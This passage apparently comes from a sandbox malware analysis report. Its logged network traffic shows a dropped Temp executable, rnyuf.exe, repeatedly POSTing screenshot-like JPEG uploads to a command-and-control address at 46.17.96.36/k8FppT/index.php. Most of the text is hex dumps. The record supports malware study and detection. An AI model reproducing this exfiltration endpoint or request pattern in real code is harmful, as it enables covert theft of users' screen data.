                                        Aug 29, 2021 22:27:27.436769009 CEST5417OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:27.437058926 CEST5424OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:27.437092066 CEST5429OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:27.472263098 CEST5435OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:27.472326040 CEST5440OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:27.602448940 CEST5501INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.44973946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:09.745954037 CEST1448OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----699541f833ca8faa1bd26fe17facb267
                                        Host: 46.17.96.36
                                        Content-Length: 107110
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:09.746045113 CEST1448OUTData Raw: 2d 2d 2d 2d 2d 2d 36 39 39 35 34 31 66 38 33 33 63 61 38 66 61 61 31 62 64 32 36 66 65 31 37 66 61 63 62 32 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------699541f833ca8faa1bd26fe17facb267Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:09.746305943 CEST1459OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:09.746454000 CEST1461OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:09.779638052 CEST1467OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:09.779907942 CEST1480OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:09.779953957 CEST1481OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:09.780002117 CEST1487OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:09.812649965 CEST1490OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:09.812701941 CEST1500OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:09.812849998 CEST1518OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:09.920275927 CEST1555INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        40192.168.2.44977646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:27.825628996 CEST5501OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----18482e8eccd3978e1e99c57ecdc4fd2f
                                        Host: 46.17.96.36
                                        Content-Length: 109159
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:27.826050997 CEST5502OUTData Raw: 2d 2d 2d 2d 2d 2d 31 38 34 38 32 65 38 65 63 63 64 33 39 37 38 65 31 65 39 39 63 35 37 65 63 64 63 34 66 64 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------18482e8eccd3978e1e99c57ecdc4fd2fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:27.826472998 CEST5512OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:27.826848984 CEST5514OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:27.858918905 CEST5517OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:27.859014988 CEST5525OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:27.859352112 CEST5528OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:27.859502077 CEST5535OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:27.859544992 CEST5540OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:27.892518044 CEST5543OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:27.892582893 CEST5561OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:27.991939068 CEST5611INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        41192.168.2.44977746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:28.260916948 CEST5612OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0eca12f9569ffde04e01e318ef40cd43
                                        Host: 46.17.96.36
                                        Content-Length: 109213
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:28.260962009 CEST5612OUTData Raw: 2d 2d 2d 2d 2d 2d 30 65 63 61 31 32 66 39 35 36 39 66 66 64 65 30 34 65 30 31 65 33 31 38 65 66 34 30 63 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0eca12f9569ffde04e01e318ef40cd43Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:28.261349916 CEST5622OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:28.261395931 CEST5625OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:28.297034025 CEST5628OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:28.297112942 CEST5636OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:28.297147036 CEST5644OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:28.297178984 CEST5650OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:28.334072113 CEST5653OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:28.334104061 CEST5656OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:28.334187984 CEST5672OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:28.445931911 CEST5722INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        42192.168.2.44977846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:28.676486969 CEST5723OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8c
                                        Host: 46.17.96.36
                                        Content-Length: 108017
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:28.676611900 CEST5723OUTData Raw: 2d 2d 2d 2d 2d 2d 35 63 63 66 38 31 65 35 64 35 62 65 65 64 66 33 32 65 66 38 64 37 63 33 64 37 61 63 36 63 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------5ccf81e5d5beedf32ef8d7c3d7ac6c8cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:28.676836967 CEST5733OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:28.676965952 CEST5735OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:28.710676908 CEST5744OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
